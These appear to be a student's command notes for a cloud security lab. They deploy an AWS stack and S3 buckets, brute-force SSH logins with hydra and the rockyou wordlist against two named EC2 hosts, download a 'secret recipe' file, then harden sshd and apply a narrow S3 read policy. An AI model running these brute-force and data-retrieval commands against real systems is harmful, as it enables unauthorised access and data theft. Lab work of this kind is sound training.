aws cloudformation create-stack --region us-east-1 --stack-name c3-app --template-body file://starter/c3-app.yml --parameters ParameterKey=KeyPair,ParameterValue=project3_key02 --capabilities CAPABILITY_IAM

aws s3 cp starter/free_recipe.txt s3://cand-c3-free-recipes-324935295600/ --region us-east-1

aws s3 cp starter/secret_recipe.txt s3://cand-c3-secret-recipes-324935295600/ --region us-east-1

date
hydra -l ubuntu -P rockyou.txt ssh://ec2-3-235-164-82.compute-1.amazonaws.com

hydra -l ubuntu -P rockyou.txt ssh://ec2-44-206-114-199.compute-1.amazonaws.com


aws s3 ls  s3://cand-c3-secret-recipes-324935295600/ --region us-east-1

aws s3 cp s3://cand-c3-secret-recipes-324935295600/secret_recipe.txt  .  --region us-east-1

cat secret_recipe.txt


sudo vi /etc/ssh/sshd_config

sudo service ssh restart


{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::cand-c3-free-recipes-324935295600/*"
        }
    ]
}